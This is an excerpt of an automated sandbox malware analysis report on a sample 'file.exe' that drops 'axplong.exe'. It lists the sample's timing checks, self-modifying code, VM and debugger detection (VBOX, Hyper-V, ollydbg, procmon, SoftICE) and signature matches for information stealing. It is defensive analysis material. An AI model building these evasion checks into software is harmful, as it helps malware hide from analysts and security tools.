                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54D0362 second address: 54D0382 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 test edx, 61000000h 0x0000000b pushad 0x0000000c mov si, DD77h 0x00000010 mov al, DAh 0x00000012 popad 0x00000013 jne 00007FA29E3F5149h 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c mov ebx, eax 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54D0382 second address: 54D0387 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54D0387 second address: 54D038D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54D038D second address: 54D0391 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54D0391 second address: 54D03A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 test byte ptr [esi+48h], 00000001h 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54D03A2 second address: 54D03AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov ecx, 0DCA664Fh 0x00000009 popad 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54C0714 second address: 54C0741 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA22C516E49h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FA22C516E3Dh 0x00000011 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54C0741 second address: 54C077A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA22C835FB1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b mov si, di 0x0000000e movsx edi, cx 0x00000011 popad 0x00000012 xchg eax, ebp 0x00000013 jmp 00007FA22C835FB2h 0x00000018 mov ebp, esp 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54C077A second address: 54C077E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54C077E second address: 54C0784 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54C0784 second address: 54C0793 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA22C516E3Bh 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54C0793 second address: 54C0811 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 and esp, FFFFFFF8h 0x0000000b jmp 00007FA22C835FB5h 0x00000010 xchg eax, ebx 0x00000011 pushad 0x00000012 mov ax, A013h 0x00000016 pushfd 0x00000017 jmp 00007FA22C835FB8h 0x0000001c jmp 00007FA22C835FB5h 0x00000021 popfd 0x00000022 popad 0x00000023 push eax 0x00000024 jmp 00007FA22C835FB1h 0x00000029 xchg eax, ebx 0x0000002a jmp 00007FA22C835FAEh 0x0000002f xchg eax, esi 0x00000030 push eax 0x00000031 push edx 0x00000032 push eax 0x00000033 push edx 0x00000034 pushad 0x00000035 popad 0x00000036 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54C0811 second address: 54C0817 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54C0817 second address: 54C086E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA22C835FB4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007FA22C835FABh 0x0000000f xchg eax, esi 0x00000010 jmp 00007FA22C835FB6h 0x00000015 mov esi, dword ptr [ebp+08h] 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007FA22C835FB7h 0x0000001f rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54C086E second address: 54C0874 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54C0874 second address: 54C0878 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54C09AE second address: 54C09BE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA22C516E3Ch 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54C09BE second address: 54C09C2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54C09C2 second address: 54C09F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007FA22C516E3Eh 0x0000000e xchg eax, ebx 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007FA22C516E47h 0x00000016 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54C09F3 second address: 54C09F9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54C09F9 second address: 54C09FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54C09FD second address: 54C0A01 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54C0A01 second address: 54C0A1F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esi 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FA22C516E43h 0x00000010 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54C0A1F second address: 54C0A37 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA22C835FB4h 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54C0A37 second address: 54C0A59 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], ebx 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e call 00007FA22C516E43h 0x00000013 pop eax 0x00000014 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54D0BC8 second address: 54D0BE3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA22C835FB7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54D0BE3 second address: 54D0BE9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54D0BE9 second address: 54D0BED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54D0BED second address: 54D0BF1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54D0A11 second address: 54D0A2C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA22C835FB7h 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5540784 second address: 554078A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 554078A second address: 554078E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 554078E second address: 55407D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007FA22C516E48h 0x0000000e xchg eax, ebp 0x0000000f jmp 00007FA22C516E40h 0x00000014 mov ebp, esp 0x00000016 pushad 0x00000017 call 00007FA22C516E3Eh 0x0000001c pop edx 0x0000001d push eax 0x0000001e push edx 0x0000001f pushad 0x00000020 popad 0x00000021 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5530EA8 second address: 5530EC5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA22C835FB9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5530EC5 second address: 5530F41 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FA22C516E47h 0x00000009 or si, F0BEh 0x0000000e jmp 00007FA22C516E49h 0x00000013 popfd 0x00000014 movzx esi, dx 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a push eax 0x0000001b pushad 0x0000001c mov ax, 0EFFh 0x00000020 call 00007FA22C516E44h 0x00000025 push eax 0x00000026 pop ebx 0x00000027 pop esi 0x00000028 popad 0x00000029 xchg eax, ebp 0x0000002a jmp 00007FA22C516E3Dh 0x0000002f mov ebp, esp 0x00000031 pushad 0x00000032 mov edx, ecx 0x00000034 movzx ecx, dx 0x00000037 popad 0x00000038 pop ebp 0x00000039 push eax 0x0000003a push edx 0x0000003b push eax 0x0000003c push edx 0x0000003d pushad 0x0000003e popad 0x0000003f rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5530F41 second address: 5530F47 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5530D64 second address: 5530D8D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 popad 0x00000008 xchg eax, ebp 0x00000009 jmp 00007FA22C516E48h 0x0000000e mov ebp, esp 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5530D8D second address: 5530D91 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5530D91 second address: 5530D95 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5530D95 second address: 5530D9B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5530D9B second address: 5530DA1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5530DA1 second address: 5530DA5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5530DA5 second address: 5530DC6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FA22C516E44h 0x00000012 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5530DC6 second address: 5530DD5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA22C835FABh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54D0E31 second address: 54D0E37 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55400F0 second address: 554017E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushfd 0x00000007 jmp 00007FA22C835FB0h 0x0000000c add si, F898h 0x00000011 jmp 00007FA22C835FABh 0x00000016 popfd 0x00000017 popad 0x00000018 mov dword ptr [esp], ebp 0x0000001b pushad 0x0000001c jmp 00007FA22C835FB4h 0x00000021 mov bl, ah 0x00000023 popad 0x00000024 mov ebp, esp 0x00000026 jmp 00007FA22C835FADh 0x0000002b push dword ptr [ebp+0Ch] 0x0000002e jmp 00007FA22C835FAEh 0x00000033 push dword ptr [ebp+08h] 0x00000036 jmp 00007FA22C835FB0h 0x0000003b call 00007FA22C835FA9h 0x00000040 push eax 0x00000041 push edx 0x00000042 push eax 0x00000043 push edx 0x00000044 jmp 00007FA22C835FAAh 0x00000049 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 554017E second address: 5540182 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5540182 second address: 5540188 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C6103F second address: C61046 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54F029A second address: 54F029F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54F029F second address: 54F02AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 xchg eax, ebp 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54F02AD second address: 54F02B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54F02B1 second address: 54F02B5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54F02B5 second address: 54F02BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54F02BB second address: 54F0372 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007FA22C516E3Ch 0x00000008 pop eax 0x00000009 pushfd 0x0000000a jmp 00007FA22C516E3Bh 0x0000000f and si, 93CEh 0x00000014 jmp 00007FA22C516E49h 0x00000019 popfd 0x0000001a popad 0x0000001b pop edx 0x0000001c pop eax 0x0000001d mov ebp, esp 0x0000001f pushad 0x00000020 jmp 00007FA22C516E3Ch 0x00000025 pushad 0x00000026 pushfd 0x00000027 jmp 00007FA22C516E40h 0x0000002c adc esi, 2A887F78h 0x00000032 jmp 00007FA22C516E3Bh 0x00000037 popfd 0x00000038 mov si, 96AFh 0x0000003c popad 0x0000003d popad 0x0000003e push FFFFFFFEh 0x00000040 jmp 00007FA22C516E42h 0x00000045 call 00007FA22C516E39h 0x0000004a push eax 0x0000004b push edx 0x0000004c pushad 0x0000004d mov edx, 5DB54BF0h 0x00000052 call 00007FA22C516E49h 0x00000057 pop esi 0x00000058 popad 0x00000059 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54F0372 second address: 54F03D1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movzx esi, di 0x00000006 pushfd 0x00000007 jmp 00007FA22C835FB9h 0x0000000c add esi, 4FA252D6h 0x00000012 jmp 00007FA22C835FB1h 0x00000017 popfd 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b push eax 0x0000001c jmp 00007FA22C835FB1h 0x00000021 mov eax, dword ptr [esp+04h] 0x00000025 push eax 0x00000026 push edx 0x00000027 jmp 00007FA22C835FACh 0x0000002c rdtsc
                    Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: AAE9C5 instructions caused by: Self-modifying code
                    Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: C7FB65 instructions caused by: Self-modifying code
                    Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: CECFD4 instructions caused by: Self-modifying code
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSpecial instruction interceptor: First address: 2CE9C5 instructions caused by: Self-modifying code
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSpecial instruction interceptor: First address: 49FB65 instructions caused by: Self-modifying code
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSpecial instruction interceptor: First address: 50CFD4 instructions caused by: Self-modifying code
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_05540170 rdtsc 0_2_05540170
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeThread delayed: delay time: 180000Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow / User API: threadDelayed 424Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow / User API: threadDelayed 2995Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow / User API: threadDelayed 1150Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 3200Thread sleep count: 60 > 30Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 3200Thread sleep time: -120060s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 368Thread sleep count: 55 > 30Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 368Thread sleep time: -110055s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 5588Thread sleep count: 424 > 30Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 5588Thread sleep time: -12720000s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 3840Thread sleep time: -180000s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 1460Thread sleep count: 60 > 30Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 1460Thread sleep time: -120060s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 504Thread sleep count: 2995 > 30Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 504Thread sleep time: -5992995s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 3380Thread sleep count: 1150 > 30Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 3380Thread sleep time: -2301150s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\file.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeThread delayed: delay time: 30000Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeThread delayed: delay time: 180000Jump to behavior
                    Source: axplong.exe, axplong.exe, 00000008.00000002.3424182389.0000000000450000.00000040.00000001.01000000.00000007.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
                    Source: axplong.exe, 00000008.00000002.3429938942.0000000000C99000.00000004.00000020.00020000.00000000.sdmp, axplong.exe, 00000008.00000002.3429938942.0000000000CCB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                    Source: file.exe, 00000000.00000002.2268645309.0000000000C30000.00000040.00000001.01000000.00000003.sdmp, axplong.exe, 00000002.00000002.2278299121.0000000000450000.00000040.00000001.01000000.00000007.sdmp, axplong.exe, 00000003.00000002.2295623055.0000000000450000.00000040.00000001.01000000.00000007.sdmp, axplong.exe, 00000008.00000002.3424182389.0000000000450000.00000040.00000001.01000000.00000007.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
                    Source: C:\Users\user\Desktop\file.exeSystem information queried: ModuleInformationJump to behavior
                    Source: C:\Users\user\Desktop\file.exeProcess information queried: ProcessInformationJump to behavior

                    Anti Debugging

                    barindex
                    Source: C:\Users\user\Desktop\file.exeThread information set: HideFromDebuggerJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeThread information set: HideFromDebuggerJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeThread information set: HideFromDebuggerJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeThread information set: HideFromDebuggerJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeOpen window title or class name: regmonclass
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeOpen window title or class name: gbdyllo
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeOpen window title or class name: procmon_window_class
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeOpen window title or class name: ollydbg
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeOpen window title or class name: filemonclass
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeFile opened: NTICE
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeFile opened: SICE
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeFile opened: SIWVID
                    Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_05540170 rdtsc 0_2_05540170
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeCode function: 8_2_0029645B mov eax, dword ptr fs:[00000030h]8_2_0029645B
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeCode function: 8_2_0029A1C2 mov eax, dword ptr fs:[00000030h]8_2_0029A1C2
                    Source: C:\Users\user\Desktop\file.exeProcess created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe "C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe" Jump to behavior
                    Source: axplong.exe, axplong.exe, 00000008.00000002.3424182389.0000000000450000.00000040.00000001.01000000.00000007.sdmpBinary or memory string: %Program Manager
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeCode function: 8_2_0027D312 cpuid 8_2_0027D312
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeQueries volume information: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeCode function: 8_2_0027CB1A GetSystemTimePreciseAsFileTime,GetSystemTimePreciseAsFileTime,8_2_0027CB1A

                    Stealing of Sensitive Information

                    barindex
                    Source: Yara matchFile source: 0.2.file.exe.a40000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 3.2.axplong.exe.260000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 8.2.axplong.exe.260000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.2.axplong.exe.260000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000003.00000002.2295538512.0000000000261000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000008.00000002.3422539297.0000000000261000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.2268543897.0000000000A41000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
